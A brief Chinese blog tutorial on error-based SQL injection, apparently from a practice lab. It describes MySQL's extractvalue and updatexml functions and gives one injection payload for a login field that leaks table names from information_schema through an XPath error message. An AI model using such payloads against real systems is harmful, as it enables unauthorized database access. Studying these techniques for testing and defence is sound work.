sql注入-报错注入

extractvalue函数 和 updatexml函数

  • EXTRACTVALUE (XML_document, XPath_string); 

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 

第二个参数:XPath_string (Xpath格式的字符串). 

作用:从目标XML中返回包含所查询值的字符串

  • UPDATEXML (XML_document, XPath_string, new_value); 

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 

第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 

第三个参数:new_value,String格式,替换查找到的符合条件的数据 

作用:改变文档中符合条件的节点的值

 

  • extractvalue函数

通过报错判断注入类型为单引号注入

 

调整输入使其不再报错

获取字段列数

 

 

 

 uname=' union select 1,extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 0,1))) %23 &passwd=admin&submit=Submit

 

 

 

 

 

 

 

updatexml函数

 

posted @ 2022-01-03 00:20  蜘蛛侠小童鞋  阅读(51)  评论(0编辑  收藏  举报